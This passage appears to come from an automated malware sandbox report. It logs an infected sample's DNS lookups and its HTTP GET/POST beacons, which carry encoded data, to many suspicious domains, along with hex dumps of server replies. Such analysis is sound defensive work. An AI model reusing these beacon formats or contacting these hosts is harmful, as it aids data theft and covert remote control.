Source: global trafficHTTP traffic detected: GET /0gjs/?9X=74tOIgHVPHNRmMSbQ1G0Uys/MIeqG11kjpC3ScHU6uMB9ofcxcyuUhnM5ZTTEMr+dzoew9aF0rRRY7d44cQMhCha9Z99IC62F/V5eh7ipP5pSwEDea0JBXw5a45Uq3V7Aw==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.starseedtechs.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /0bnh/?9X=zZXWIXwJGHT3YBrxenCypQewBaeTOcc2IkXhL3E/vJODxaDeFGEsUBe5EIIVaKr42GHnJ3fTVzrjb5tyhN1drPCSMiPgIdm81GPSp2FgZ1oqABPTTdL0d8xPd8XwsRNOYg==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.dorabox.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /msip/?9X=w6wz0tlIGVZZ0dJBzjMbYtpV0lMRXZOlwVjrIg8LHpJWNK6lQ7Aml8Id1YcpySOh8nlDQOeKPQwwWGnzCK1puGT5HSmHMN1dTi/bqzhFU0UoC7D1/VBGZ9K3GrDzBJ1/ig==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.lpskfz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /smpu/?1BSHu=OBVxGh8PUTflSv4p&9X=fT9kFChMB5AarVf4uwJ4SjWrUtnRCy4SEYhs5qbUmyCbD8/bJwwHr5ZsD7KDf/ys2t/zimMcaAHu0zRNXmaWGIA1V7G/4fD2oSnkvqck/+1ElBxjD31eR7F5E9/q372Edw== HTTP/1.1Host: www.7wkto5nk230724z.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /b5ow/?9X=8LMR5gxnI2KgXZumrwdc+cOsoyeKRmv9aI/KcgXQMu2PSseta9mr379bAQAaBpSSNlwauLzgQiXoOYlcs2hn5ZOCoHo9ZIPfMV7mBvL1YvynlbmYgkxyCyhThANftQWn+w==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.2925588.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /l11k/?1BSHu=OBVxGh8PUTflSv4p&9X=M8Hb3D8JFBWgl8NDQRtnT6SAJ1BxGk45Wmeu29AZTlLv6vUhGfTPJ7wrhjezmM25n5lhbrbM8JcqKDfkJqWfnug4cp36rrKREfuKJ5vJpoiT87e8p+M6jTeOWcRB3/wBow== HTTP/1.1Host: www.onlinesbi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /nwjc/?9X=vplFMCdC7aIsqq2qzVkqAyzG+skkF31Z/0uqLHtS/QTNtUfqlnIz0Od0xQPrBdYo7KQ1sh0HCuzSB788wT4eqStiFQmkDMRSnlHxaQk0f8iMWQ6+S/UMcmd0hzm0v8bMvQ==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.stoff-tanz.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /a3g8/?1BSHu=OBVxGh8PUTflSv4p&9X=rCBtjJUCi7SB2rgsrATHoblCkaEhTmMbACbG+CnZd2Ypm/CW+vOsJnZFvrxs6YcQD3M8aJdgrkwo15E7VwGofvb1NfQ6zSVSxSWpILyRw7uSQHVmZsRD5PzpuDuRbdvTXA== HTTP/1.1Host: www.newhopetoday.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /hcwd/?9X=wqsdOIwQnV+rc5xe3M17LsCEHDXbvUAt7b9v0h6Q5REfDRPnfgrmUJ/SsNAT27O4J2mBDqLSNO3xx/PwERc00aw49NjnZ10GfH1ek+9b7dOW1JjLH3u3vCxZXNj5tdujpA==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.rvmsensors.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.refs4refs.info
Source: global trafficDNS traffic detected: DNS query: www.femaled.info
Source: global trafficDNS traffic detected: DNS query: www.digitaladpro.shop
Source: global trafficDNS traffic detected: DNS query: www.astrext.info
Source: global trafficDNS traffic detected: DNS query: www.nexari.xyz
Source: global trafficDNS traffic detected: DNS query: www.starseedtechs.net
Source: global trafficDNS traffic detected: DNS query: www.dorabox.org
Source: global trafficDNS traffic detected: DNS query: www.lpskfz.top
Source: global trafficDNS traffic detected: DNS query: www.7wkto5nk230724z.click
Source: global trafficDNS traffic detected: DNS query: www.2925588.com
Source: global trafficDNS traffic detected: DNS query: www.onlinesbi.xyz
Source: global trafficDNS traffic detected: DNS query: www.stoff-tanz.online
Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
Source: global trafficDNS traffic detected: DNS query: www.rvmsensors.net
Source: global trafficDNS traffic detected: DNS query: www.treatyourownhip.online
Source: unknownHTTP traffic detected: POST /6lzj/ HTTP/1.1Host: www.femaled.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Length: 203Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.femaled.infoReferer: http://www.femaled.info/6lzj/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 39 58 3d 38 43 41 41 2f 51 79 68 4e 70 6e 42 6f 56 2b 4f 54 31 6c 4f 43 71 7a 47 77 5a 2f 55 70 35 4a 4d 50 38 44 57 6f 4a 69 75 35 44 57 73 76 55 39 31 70 57 51 36 58 54 34 51 52 55 2f 6d 54 54 74 51 47 63 59 4e 6e 58 71 74 6c 55 75 45 6d 43 2b 44 78 52 79 6a 2f 36 30 4c 64 4d 77 77 70 33 2b 38 50 68 56 74 56 55 4f 72 58 34 58 6f 46 5a 41 52 48 69 4c 71 47 4f 51 75 6c 75 64 43 31 46 59 31 6f 5a 72 50 58 46 56 5a 53 71 39 51 57 75 36 4b 39 49 47 4e 55 65 41 47 78 6f 7a 2b 35 30 2f 2f 69 74 76 32 5a 59 36 68 37 67 45 56 4f 45 6b 43 57 33 7a 37 63 4a 55 68 73 33 6f 6a 50 6b 4f 62 49 79 6d 35 47 45 63 3d Data Ascii: 9X=8CAA/QyhNpnBoV+OT1lOCqzGwZ/Up5JMP8DWoJiu5DWsvU91pWQ6XT4QRU/mTTtQGcYNnXqtlUuEmC+DxRyj/60LdMwwp3+8PhVtVUOrX4XoFZARHiLqGOQuludC1FY1oZrPXFVZSq9QWu6K9IGNUeAGxoz+50//itv2ZY6h7gEVOEkCW3z7cJUhs3ojPkObIym5GEc=
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:21 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:23 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:26 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:28 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1729X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 